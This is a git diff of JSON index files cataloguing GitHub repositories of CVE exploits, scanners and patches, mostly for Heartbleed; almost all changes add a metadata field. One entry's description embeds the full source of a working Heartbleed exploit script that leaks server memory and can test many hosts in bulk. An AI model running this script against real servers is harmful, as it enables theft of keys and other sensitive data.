"user_view_type": "public" }, "html_url": "https:\/\/github.com\/Everdoh\/CVE-2013-6490", "description": null, diff --git a/2013/CVE-2013-6668.json b/2013/CVE-2013-6668.json index 0591bda6a2..cd0289d10c 100644 --- a/2013/CVE-2013-6668.json +++ b/2013/CVE-2013-6668.json @@ -7,7 +7,8 @@ "login": "sdneon", "id": 8720479, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8720479?v=4", - "html_url": "https:\/\/github.com\/sdneon" + "html_url": "https:\/\/github.com\/sdneon", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sdneon\/CveTest", "description": "Test case for Node.JS V0.10.31 v8 backport CVE-2013-6668 crash", diff --git a/2013/CVE-2013-6987.json b/2013/CVE-2013-6987.json index 18dae8cf81..1ae0be7675 100644 --- a/2013/CVE-2013-6987.json +++ b/2013/CVE-2013-6987.json @@ -7,7 +7,8 @@ "login": "stoicboomer", "id": 45523448, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45523448?v=4", - "html_url": "https:\/\/github.com\/stoicboomer" + "html_url": "https:\/\/github.com\/stoicboomer", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/stoicboomer\/CVE-2013-6987", "description": "exploit for DNS 4.3", diff --git a/2014/CVE-2014-0038.json b/2014/CVE-2014-0038.json index cd9bb465c1..27ad74c86a 100644 --- a/2014/CVE-2014-0038.json +++ b/2014/CVE-2014-0038.json @@ -7,7 +7,8 @@ "login": "saelo", "id": 2453290, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2453290?v=4", - "html_url": "https:\/\/github.com\/saelo" + "html_url": "https:\/\/github.com\/saelo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/saelo\/cve-2014-0038", "description": "Linux local root exploit for CVE-2014-0038", @@ -41,7 +42,8 @@ "login": "kiruthikan99", "id": 64960253, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64960253?v=4", - "html_url": "https:\/\/github.com\/kiruthikan99" + "html_url": "https:\/\/github.com\/kiruthikan99", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/kiruthikan99\/IT19115276", "description": "SNP Assignment 1 Report - Linux box exploitation ( Vulnerability CVE-2014-0038)", diff --git a/2014/CVE-2014-0043.json b/2014/CVE-2014-0043.json index 1354d9b4e3..adbdbee3ae 100644 --- a/2014/CVE-2014-0043.json +++ b/2014/CVE-2014-0043.json @@ -7,7 +7,8 @@ "login": "JJK96", "id": 11193274, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11193274?v=4", - "html_url": "https:\/\/github.com\/JJK96" + "html_url": "https:\/\/github.com\/JJK96", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/JJK96\/JavaClasspathEnum", "description": "Java classpath enumeration, focussed on CVE-2014-0043 for Apache Wicket 6.x", diff --git a/2014/CVE-2014-0050.json b/2014/CVE-2014-0050.json index 14262642c3..2351813668 100644 --- a/2014/CVE-2014-0050.json +++ b/2014/CVE-2014-0050.json @@ -7,7 +7,8 @@ "login": "jrrdev", "id": 17674081, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17674081?v=4", - "html_url": "https:\/\/github.com\/jrrdev" + "html_url": "https:\/\/github.com\/jrrdev", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/jrrdev\/cve-2014-0050", "description": "CVE-2014-0050 Vulnerable site sample", diff --git a/2014/CVE-2014-0094.json b/2014/CVE-2014-0094.json index c3f9287050..becc8a0ba1 100644 --- a/2014/CVE-2014-0094.json +++ b/2014/CVE-2014-0094.json @@ -7,7 +7,8 @@ "login": "HasegawaTadamitsu", "id": 128817, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128817?v=4", - "html_url": "https:\/\/github.com\/HasegawaTadamitsu" + "html_url": "https:\/\/github.com\/HasegawaTadamitsu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/HasegawaTadamitsu\/CVE-2014-0094-test-program-for-struts1", "description": "CVE-2014-0094 test program for struts1", @@ -37,7 +38,8 @@ "login": "y0d3n", "id": 51740737, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51740737?v=4", - "html_url": "https:\/\/github.com\/y0d3n" + "html_url": "https:\/\/github.com\/y0d3n", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/y0d3n\/CVE-2014-0094", "description": null, diff --git a/2014/CVE-2014-0114.json b/2014/CVE-2014-0114.json index c671bc596e..e311eac19e 100644 --- a/2014/CVE-2014-0114.json +++ b/2014/CVE-2014-0114.json @@ -7,7 +7,8 @@ "login": "rgielen", "id": 64990, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64990?v=4", - "html_url": "https:\/\/github.com\/rgielen" + "html_url": "https:\/\/github.com\/rgielen", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/rgielen\/struts1filter", "description": "A request parameter filter solution for Struts 1 CVE-2014-0114 based on the work of Alvaro Munoz and the HP Fortify team", @@ -37,7 +38,8 @@ "login": "ricedu", "id": 7359760, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7359760?v=4", - "html_url": "https:\/\/github.com\/ricedu" + "html_url": "https:\/\/github.com\/ricedu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ricedu\/struts1-patch", "description": "struts1 CVE-2014-0114 classLoader manipulation vulnerability patch", @@ -67,7 +69,8 @@ "login": "aenlr", "id": 33195524, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33195524?v=4", - "html_url": "https:\/\/github.com\/aenlr" + "html_url": "https:\/\/github.com\/aenlr", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/aenlr\/strutt-cve-2014-0114", "description": null, diff --git a/2014/CVE-2014-0130.json b/2014/CVE-2014-0130.json index ae3acc53e8..1ee6938aaf 100644 --- a/2014/CVE-2014-0130.json +++ b/2014/CVE-2014-0130.json @@ -7,7 +7,8 @@ "login": "omarkurt", "id": 1712468, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1712468?v=4", - "html_url": "https:\/\/github.com\/omarkurt" + "html_url": "https:\/\/github.com\/omarkurt", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/omarkurt\/cve-2014-0130", "description": "cve-2014-0130 rails directory traversal vuln", diff --git a/2014/CVE-2014-0160.json b/2014/CVE-2014-0160.json index 2248458d91..e2a765efdc 100644 --- a/2014/CVE-2014-0160.json +++ b/2014/CVE-2014-0160.json @@ -7,7 +7,8 @@ "login": "FiloSottile", "id": 1225294, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1225294?v=4", - "html_url": "https:\/\/github.com\/FiloSottile" + "html_url": "https:\/\/github.com\/FiloSottile", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/FiloSottile\/Heartbleed", "description": "A checker (site and tool) for CVE-2014-0160", @@ -37,7 +38,8 @@ "login": "titanous", "id": 13026, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13026?v=4", - "html_url": "https:\/\/github.com\/titanous" + "html_url": "https:\/\/github.com\/titanous", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/titanous\/heartbleeder", "description": "OpenSSL CVE-2014-0160 Heartbleed vulnerability test", @@ -67,7 +69,8 @@ "login": "DominikTo", "id": 1384635, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1384635?v=4", - "html_url": "https:\/\/github.com\/DominikTo" + "html_url": "https:\/\/github.com\/DominikTo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/DominikTo\/bleed", "description": "bleed is a tool to test servers for the 'Heartbleed' vulnerability (CVE-2014-0160).", @@ -97,7 +100,8 @@ "login": "cyphar", "id": 2888411, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2888411?v=4", - "html_url": "https:\/\/github.com\/cyphar" + "html_url": "https:\/\/github.com\/cyphar", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cyphar\/heartthreader", "description": "Mass, multithreaded testing for servers against Heartbleed (CVE-2014-0160).", @@ -127,7 +131,8 @@ "login": "jdauphant", "id": 1238254, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1238254?v=4", - "html_url": "https:\/\/github.com\/jdauphant" + "html_url": "https:\/\/github.com\/jdauphant", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/jdauphant\/patch-openssl-CVE-2014-0160", "description": "Patch openssl #heartbleed with ansible ", @@ -157,7 +162,8 @@ "login": "musalbas", "id": 5038597, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5038597?v=4", - "html_url": "https:\/\/github.com\/musalbas" + "html_url": "https:\/\/github.com\/musalbas", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/musalbas\/heartbleed-masstest", "description": "Multi-threaded tool for scanning many hosts for CVE-2014-0160.", @@ -187,7 +193,8 @@ "login": "obayesshelton", "id": 628720, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/628720?v=4", - "html_url": "https:\/\/github.com\/obayesshelton" + "html_url": "https:\/\/github.com\/obayesshelton", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/obayesshelton\/CVE-2014-0160-Scanner", "description": null, @@ -217,7 +224,8 @@ "login": "Lekensteyn", "id": 164530, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164530?v=4", - "html_url": "https:\/\/github.com\/Lekensteyn" + "html_url": "https:\/\/github.com\/Lekensteyn", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Lekensteyn\/pacemaker", "description": "Heartbleed (CVE-2014-0160) client exploit", @@ -247,7 +255,8 @@ "login": "isgroup", "id": 8706498, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8706498?v=4", - "html_url": "https:\/\/github.com\/isgroup" + "html_url": "https:\/\/github.com\/isgroup", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/isgroup\/openmagic", "description": "OpenSSL TLS heartbeat read overrun (CVE-2014-0160)", @@ -277,7 +286,8 @@ "login": "fb1h2s", "id": 2658510, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2658510?v=4", - "html_url": "https:\/\/github.com\/fb1h2s" + "html_url": "https:\/\/github.com\/fb1h2s", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fb1h2s\/CVE-2014-0160", "description": "openssl Heart Bleed Exploit: CVE-2014-0160 Mass Security Auditor", @@ -307,7 +317,8 @@ "login": "takeshixx", "id": 5837896, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837896?v=4", - "html_url": "https:\/\/github.com\/takeshixx" + "html_url": "https:\/\/github.com\/takeshixx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/takeshixx\/ssl-heartbleed.nse", "description": "Nmap NSE script that discovers\/exploits Heartbleed\/CVE-2014-0160", @@ -337,7 +348,8 @@ "login": "roganartu", "id": 1133705, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1133705?v=4", - "html_url": "https:\/\/github.com\/roganartu" + "html_url": "https:\/\/github.com\/roganartu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/roganartu\/heartbleedchecker-chrome", "description": "Chrome extension that automatically checks visited sites for vulnerability to OpenSSL CVE-2014-0160", @@ -367,7 +379,8 @@ "login": "zouguangxian", "id": 863281, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/863281?v=4", - "html_url": "https:\/\/github.com\/zouguangxian" + "html_url": "https:\/\/github.com\/zouguangxian", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zouguangxian\/heartbleed", "description": "Checks for vulnerabilities: CVE-2014-0160 ", @@ -397,7 +410,8 @@ "login": "sensepost", "id": 1193973, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1193973?v=4", - "html_url": "https:\/\/github.com\/sensepost" + "html_url": "https:\/\/github.com\/sensepost", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sensepost\/heartbleed-poc", "description": "Test for SSL heartbeat vulnerability (CVE-2014-0160)", @@ -427,7 +441,8 @@ "login": "proactiveRISK", "id": 7243071, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7243071?v=4", - "html_url": "https:\/\/github.com\/proactiveRISK" + "html_url": "https:\/\/github.com\/proactiveRISK", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/proactiveRISK\/heartbleed-extention", "description": "A firefox extension and checker for CVE-2014-0160", @@ -457,7 +472,8 @@ "login": "amerine", "id": 1016, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1016?v=4", - "html_url": "https:\/\/github.com\/amerine" + "html_url": "https:\/\/github.com\/amerine", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/amerine\/coronary", "description": "Test CIDR blocks for CVE-2014-0160\/Heartbleed", @@ -487,7 +503,8 @@ "login": "0x90", "id": 806042, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/806042?v=4", - "html_url": "https:\/\/github.com\/0x90" + "html_url": "https:\/\/github.com\/0x90", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0x90\/CVE-2014-0160", "description": "Heartbleed variants", @@ -517,7 +534,8 @@ "login": "ice-security88", "id": 7246782, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7246782?v=4", - "html_url": "https:\/\/github.com\/ice-security88" + "html_url": "https:\/\/github.com\/ice-security88", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ice-security88\/CVE-2014-0160", "description": null, @@ -547,7 +565,8 @@ "login": "waqasjamal-zz", "id": 2502430, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2502430?v=4", - "html_url": "https:\/\/github.com\/waqasjamal-zz" + "html_url": "https:\/\/github.com\/waqasjamal-zz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/waqasjamal-zz\/HeartBleed-Vulnerability-Checker", "description": "This repo contains a script to automatically test sites for vulnerability to the Heartbleed Bug (CVE-2014-0160) based on the input file for the urls.", @@ -577,7 +596,8 @@ "login": "siddolo", "id": 2439981, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2439981?v=4", - "html_url": "https:\/\/github.com\/siddolo" + "html_url": "https:\/\/github.com\/siddolo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/siddolo\/knockbleed", "description": "CVE-2014-0160 mass test against subdomains", @@ -607,7 +627,8 @@ "login": "sammyfung", "id": 50470, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50470?v=4", - "html_url": "https:\/\/github.com\/sammyfung" + "html_url": "https:\/\/github.com\/sammyfung", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sammyfung\/openssl-heartbleed-fix", "description": "OpenSSL Heartbleed (CVE-2014-0160) Fix script", @@ -637,7 +658,8 @@ "login": "a0726h77", "id": 127018, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127018?v=4", - "html_url": "https:\/\/github.com\/a0726h77" + "html_url": "https:\/\/github.com\/a0726h77", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/a0726h77\/heartbleed-test", "description": "CVE-2014-0160 scanner", @@ -667,7 +689,8 @@ "login": "pblittle", "id": 21940, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21940?v=4", - "html_url": "https:\/\/github.com\/pblittle" + "html_url": "https:\/\/github.com\/pblittle", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pblittle\/aws-suture", "description": "OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner.", @@ -701,7 +724,8 @@ "login": "hreese", "id": 892400, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/892400?v=4", - "html_url": "https:\/\/github.com\/hreese" + "html_url": "https:\/\/github.com\/hreese", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hreese\/heartbleed-dtls", "description": "POC for CVE-2014-0160 (Heartbleed) for DTLS", @@ -731,7 +755,8 @@ "login": "wwwiretap", "id": 210109, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/210109?v=4", - "html_url": "https:\/\/github.com\/wwwiretap" + "html_url": "https:\/\/github.com\/wwwiretap", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/wwwiretap\/bleeding_onions", "description": "Script to find Exit and Guard nodes in the Tor Network, that are still suffering from CVE-2014-0160", @@ -761,7 +786,8 @@ "login": "idkqh7", "id": 2221840, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2221840?v=4", - "html_url": "https:\/\/github.com\/idkqh7" + "html_url": "https:\/\/github.com\/idkqh7", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/idkqh7\/heatbleeding", "description": "Test script for test 1Password database for SSL Hea(r)t Bleeding (CVE-2014-0160)", @@ -791,7 +817,8 @@ "login": "GeeksXtreme", "id": 5917335, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5917335?v=4", - "html_url": "https:\/\/github.com\/GeeksXtreme" + "html_url": "https:\/\/github.com\/GeeksXtreme", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/GeeksXtreme\/ssl-heartbleed.nse", "description": "Nmap NSE script that discovers\/exploits Heartbleed\/CVE-2014-0160.", @@ -821,7 +848,8 @@ "login": "xlucas", "id": 2470398, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2470398?v=4", - "html_url": "https:\/\/github.com\/xlucas" + "html_url": "https:\/\/github.com\/xlucas", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/xlucas\/heartbleed", "description": "A research tool designed to check for OpenSSL CVE-2014-0160 vulnerability", @@ -851,7 +879,8 @@ "login": "indiw0rm", "id": 7300510, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7300510?v=4", - "html_url": "https:\/\/github.com\/indiw0rm" + "html_url": "https:\/\/github.com\/indiw0rm", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/indiw0rm\/-Heartbleed-", "description": "A checker (site and tool) for CVE-2014-0160: ", @@ -881,7 +910,8 @@ "login": "einaros", "id": 394360, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/394360?v=4", - "html_url": "https:\/\/github.com\/einaros" + "html_url": "https:\/\/github.com\/einaros", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/einaros\/heartbleed-tools", "description": "OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner, data miner and RSA key-restore tools.", @@ -911,7 +941,8 @@ "login": "mozilla-services", "id": 1066228, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1066228?v=4", - "html_url": "https:\/\/github.com\/mozilla-services" + "html_url": "https:\/\/github.com\/mozilla-services", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mozilla-services\/Heartbleed", "description": "A checker (site and tool) for CVE-2014-0160", @@ -941,7 +972,8 @@ "login": "yryz", "id": 1646732, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1646732?v=4", - "html_url": "https:\/\/github.com\/yryz" + "html_url": "https:\/\/github.com\/yryz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/yryz\/heartbleed.js", "description": "openssl Heartbleed bug(CVE-2014-0160) check for Node.js ", @@ -976,7 +1008,8 @@ "login": "DisK0nn3cT", "id": 727064, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/727064?v=4", - "html_url": "https:\/\/github.com\/DisK0nn3cT" + "html_url": "https:\/\/github.com\/DisK0nn3cT", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/DisK0nn3cT\/MaltegoHeartbleed", "description": "Maltego transform to detect the OpenSSL Heartbleed vulnerability (CVE-2014-0160)", @@ -1006,7 +1039,8 @@ "login": "OffensivePython", "id": 6576532, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6576532?v=4", - "html_url": "https:\/\/github.com\/OffensivePython" + "html_url": "https:\/\/github.com\/OffensivePython", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/OffensivePython\/HeartLeak", "description": "CVE-2014-0160 (Heartbeat Buffer over-read bug)", @@ -1036,7 +1070,8 @@ "login": "vortextube", "id": 7092728, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7092728?v=4", - "html_url": "https:\/\/github.com\/vortextube" + "html_url": "https:\/\/github.com\/vortextube", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/vortextube\/ssl_scanner", "description": "Heartbleed (CVE-2014-0160) SSLv3 Scanner", @@ -1066,7 +1101,8 @@ "login": "mpgn", "id": 5891788, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", - "html_url": "https:\/\/github.com\/mpgn" + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mpgn\/heartbleed-PoC", "description": ":broken_heart: Hearbleed exploit to retrieve sensitive information CVE-2014-0160 :broken_heart:", @@ -1096,7 +1132,8 @@ "login": "xanas", "id": 11810462, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11810462?v=4", - "html_url": "https:\/\/github.com\/xanas" + "html_url": "https:\/\/github.com\/xanas", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/xanas\/heartbleed.py", "description": "#!\/usr\/bin\/python # Modified by Travis Lee # -changed output to display text only instead of hexdump and made it easier to read # -added option to specify number of times to connect to server (to get more data) # -added option to specify TLS version # -added option to send STARTTLS command for use with SMTP\/POP\/IMAP\/FTP\/etc... # -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port) # -added option to have verbose output # -added capability to automatically check if STARTTLS\/STLS\/AUTH TLS is supported when smtp\/pop\/imap\/ftp ports are entered and automatically send appropriate command # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect\/loop (default: 1)') options.add_option('-t', '--tls', type='int', default=1, help='Specify TLS version: 0 = 1.0, 1 = 1.1, 2 = 1.2 (default: 1)') options.add_option('-s', '--starttls', action=\"store_true\", dest=\"starttls\", help='Issue STARTTLS command for SMTP\/POP\/IMAP\/FTP\/etc...') options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port') options.add_option('-v', '--verbose', action=\"store_true\", dest=\"verbose\", help='Enable verbose output') opts, args = options.parse_args() def h2bin(x): return x.replace(' ', '').replace('\\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') # set TLS version if opts.tls == 0: hb = h2bin('''18 03 01 00 03 01 40 00''') elif opts.tls == 1: hb = h2bin('''18 03 02 00 03 01 40 00''') elif opts.tls == 2: hb = h2bin('''18 03 03 00 03 01 40 00''') else: hb = h2bin('''18 03 02 00 03 01 40 00''') def hexdump(s): pdat = '' for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] #hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin) \t#print ' %04x: %-48s %s' % (b, hxdat, pdat) \tpdat = re.sub(r'([.]{50,})', '', pdat) return pdat def recvall(s, length, timeout=5): try: endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata except: print \"Error receiving data: \", sys.exc_info()[0] def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None if opts.verbose: print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s, targ): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return '' if typ == 24: if opts.verbose: print 'Received heartbeat response...' #hexdump(pay) if len(pay) > 3: print 'WARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return hexdump(pay) if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return '' def bleed(targ, port): try: res = '' print print '##################################################################' print 'Connecting to: ' + targ + ':' + str(port) + ' with TLSv1.' + str(opts.tls) for x in range(0, opts.num): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sys.stdout.flush() s.settimeout(10) s.connect((targ, port)) # send starttls command if specified as an option or if common smtp\/pop3\/imap ports are used if (opts.starttls) or (port in {25, 587, 110, 143, 21}): stls = False atls = False # check if smtp supports starttls\/stls if port in {25, 587}: print 'SMTP Port... Checking for STARTTLS Capability...' check = s.recv(1024) s.send(\"EHLO someone.org\\n\") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if \"STARTTLS\" in check: opts.starttls = True print \"STARTTLS command found\" elif \"STLS\" in check: opts.starttls = True stls = True print \"STLS command found\" else: print \"STARTTLS command NOT found!\" print '##################################################################' return # check if pop3\/imap supports starttls\/stls elif port in {110, 143}: print 'POP3\/IMAP4 Port... Checking for STARTTLS Capability...' check = s.recv(1024) if port == 110: s.send(\"CAPA\\n\") if port == 143: s.send(\"CAPABILITY\\n\") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if \"STARTTLS\" in check: opts.starttls = True print \"STARTTLS command found\" elif \"STLS\" in check: opts.starttls = True stls = True print \"STLS command found\" else: print \"STARTTLS command NOT found!\" print '##################################################################' return # check if ftp supports auth tls\/starttls elif port in {21}: print 'FTP Port... Checking for AUTH TLS Capability...' check = s.recv(1024) s.send(\"FEAT\\n\") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if \"STARTTLS\" in check: opts.starttls = True print \"STARTTLS command found\" elif \"AUTH TLS\" in check: opts.starttls = True atls = True print \"AUTH TLS command found\" else: print \"STARTTLS command NOT found!\" print '##################################################################' return # send appropriate tls command if supported if opts.starttls: sys.stdout.flush() if stls: print 'Sending STLS Command...' s.send(\"STLS\\n\") elif atls: print 'Sending AUTH TLS Command...' s.send(\"AUTH TLS\\n\") else: print 'Sending STARTTLS Command...' s.send(\"STARTTLS\\n\") if opts.verbose: print 'Waiting for reply...' sys.stdout.flush() recvall(s, 100000, 1) print print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) if opts.verbose: print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' print '##################################################################' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) res += hit_hb(s, targ) s.close() print '##################################################################' print return res except: print \"Error connecting to host: \", sys.exc_info()[0] print '##################################################################' print def main(): allresults = '' # if a file is specified, loop through file if opts.filein: fileIN = open(opts.filein, \"r\") for line in fileIN: targetinfo = line.strip().split(\":\") if len(targetinfo) > 1: allresults = bleed(targetinfo[0], int(targetinfo[1])) else: allresults = bleed(targetinfo[0], opts.port) if allresults: print '%s' % (allresults) fileIN.close() else: if len(args) < 1: options.print_help() return allresults = bleed(args[0], opts.port) if allresults: print '%s' % (allresults) print if __name__ == '__main__': main()", @@ -1126,7 +1163,8 @@ "login": "iSCInc", "id": 6920447, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6920447?v=4", - "html_url": "https:\/\/github.com\/iSCInc" + "html_url": "https:\/\/github.com\/iSCInc", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/iSCInc\/heartbleed", "description": "A checker (site and tool) for CVE-2014-0160. Software from @FiloSottile for iSC Inc..", @@ -1156,7 +1194,8 @@ "login": "marstornado", "id": 1574834, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1574834?v=4", - "html_url": "https:\/\/github.com\/marstornado" + "html_url": "https:\/\/github.com\/marstornado", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/marstornado\/cve-2014-0160-Yunfeng-Jiang", "description": null, @@ -1186,7 +1225,8 @@ "login": "hmlio", "id": 11684719, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11684719?v=4", - "html_url": "https:\/\/github.com\/hmlio" + "html_url": "https:\/\/github.com\/hmlio", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hmlio\/vaas-cve-2014-0160", "description": "Vulnerability as a service: showcasing CVS-2014-0160, a.k.a. Heartbleed", @@ -1216,7 +1256,8 @@ "login": "hybridus", "id": 5206389, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5206389?v=4", - "html_url": "https:\/\/github.com\/hybridus" + "html_url": "https:\/\/github.com\/hybridus", + "user_view_type": "public" }, "html_url": 